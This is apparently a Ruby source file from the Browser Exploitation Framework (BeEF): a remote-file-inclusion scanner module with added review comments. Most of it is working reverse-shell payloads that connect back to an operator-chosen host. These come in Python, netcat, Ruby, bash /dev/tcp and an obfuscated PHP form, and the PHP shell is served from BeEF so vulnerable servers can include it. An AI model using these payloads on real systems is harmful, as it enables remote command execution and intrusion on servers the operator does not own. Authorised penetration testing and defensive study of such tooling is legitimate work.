#
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Rfi_scanner < BeEF::Core::Command
  # BeEF command module behind the RFI scanner.
  #
  # Before the command is pushed to the hooked browser, `pre_send` renders a
  # PHP file whose body is selected by the 'payload' input and registers it
  # with BeEF's asset handler under /rfi_php_<command_id>.txt, so the scanner
  # has a URL it can reference. `self.options` declares the UI inputs and
  # `post_execute` stores whatever the browser reports back.
  def pre_send
    # Defaults used when the matching input is absent from @datastore.
    # `lport` starts as an Integer but is replaced by whatever String the UI
    # supplied; it is only ever interpolated into text, so the type does not
    # matter here.
    lhost = '127.0.0.1'
    lport = 4444
    payload = 'reverse_php'
    # In this hook @datastore is walked as a list of {'name','value'} hashes
    # (compare post_execute, which indexes it by key) — presumably the
    # framework hands over a different shape per phase; confirm against
    # BeEF::Core::Command.
    @datastore.each do |input|
      case input['name']
      when 'lhost'
        lhost = input['value']
      when 'lport'
        lport = input['value']
      end
    end
    # NOTE(review): lhost/lport are taken verbatim from the UI and interpolated
    # into the command strings and the PHP source below without any check of
    # shape (hostname/IP, numeric port). A stray quote or newline in either
    # value ends up in the served file instead of being rejected.
    @datastore.each do |input|
      next unless input['name'] == 'payload'

      # Any value not matched by a `when` (including an empty or free-text
      # selection, which the 'forceSelection' => 'false' setting in
      # self.options appears to permit — verify) falls through to the
      # reverse_php template in the `else` branch.
      case input['value']
      when 'reverse_python' # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX
        cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);")
        payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"
      when 'reverse_netcat'
        payload = "`nc #{lhost} #{lport} -e /bin/sh`"
      when 'reverse_ruby' # msfvenom -p cmd/unix/reverse_ruby LHOST=X.X.X.X LPORT=XXXX
        payload = "`ruby -rsocket -e \"exit if fork;c=TCPSocket.new('#{lhost}','#{lport}');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end\"`"
      when 'reverse_bash'
        payload = "`bash -c \"/bin/bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1\"`"
      else # "reverse_php" # msfvenom -p php/reverse_php LHOST=X.X.X.X LPORT=XXXX
        # The heredoc is interpolating (`lhost`, `lport`, and the `#{' '}`
        # lines that keep a single-space line in the output), so its body is
        # emitted byte-for-byte into the served file; do not re-indent it.
        payload = <<-EOS
$ipaddr='#{lhost}';
$port=#{lport};

@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
#{' '}

if(!function_exists('zBoGL')){
function zBoGL($c){
global $dis;
#{' '}
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\\n";
}
$eclnc='is_callable';
$wGGmd='in_array';
#{' '}
if($eclnc('system')and!$wGGmd('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($eclnc('popen')and!$wGGmd('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($eclnc('passthru')and!$wGGmd('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($eclnc('proc_open')and!$wGGmd('proc_open',$dis)){
$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($eclnc('exec')and!$wGGmd('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($eclnc('shell_exec')and!$wGGmd('shell_exec',$dis)){
$o=shell_exec($c);
}else
{
$o=0;
}

return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://#{lhost}",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=zBoGL(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=zBoGL(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
        EOS

      end
    end
    # Serve the rendered file as text/plain at a per-command path. The
    # trailing -1 looks like BeEF's "unlimited serves" count — confirm against
    # AssetHandler#bind_raw. Nothing in this module removes the binding
    # afterwards (see post_execute), so the file stays reachable on the BeEF
    # server once the command has run.
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/plain' }, "<?php #{payload} ?>", "/rfi_php_#{@command_id}.txt", -1)
  end

  # Input definitions shown in the BeEF UI for this module.
  #
  # The default local host is BeEF's configured listen address; it is blanked
  # when BeEF listens on all interfaces, since 0.0.0.0 is not a reachable
  # connect-back address and the operator has to supply one.
  def self.options
    configuration = BeEF::Core::Configuration.instance
    lhost = configuration.beef_host
    lhost = '' if lhost == '0.0.0.0'
    [
      { 'name' => 'rproto',
        'type' => 'combobox',
        'ui_label' => 'Target Protocol',
        'store_type' => 'arraystore',
        'store_fields' => ['rproto'],
        'store_data' => [
          ['http'],
          ['https']
        ],
        'emptyText' => 'Select a protocol (HTTP/HTTPS)',
        'valueField' => 'rproto',
        'displayField' => 'rproto',
        'mode' => 'local',
        'autoWidth' => true },
      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
      { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
      { 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
      { 'name' => 'payload',
        'type' => 'combobox',
        'ui_label' => 'Payload',
        'store_type' => 'arraystore',
        'store_fields' => ['payload'],
        'store_data' => [['reverse_bash'], ['reverse_netcat'], ['reverse_ruby'], ['reverse_python'], ['reverse_php']],
        'emptyText' => 'Select a payload',
        'valueField' => 'payload',
        'displayField' => 'payload',
        'mode' => 'local',
        # This is the String 'false', unlike the boolean used for 'autoWidth'
        # below. Whether the UI layer reads the string as "off" is not visible
        # here; verify if free-text payload values are (or are not) intended.
        'forceSelection' => 'false',
        'autoWidth' => true },
      { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
      { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
      { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width' => '100px' }
    ]
  end

  # Persist the result reported by the hooked browser.
  #
  # The asset bound in pre_send is left in place: the unbind call below is
  # commented out, so /rfi_php_<command_id>.txt remains served after the
  # command finishes. Re-enable it (or unbind elsewhere) if the file should
  # not outlive the command.
  def post_execute
    save({ 'result' => @datastore['result'] })
    # BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/rfi_php_#{@command_id}.txt")
  end
end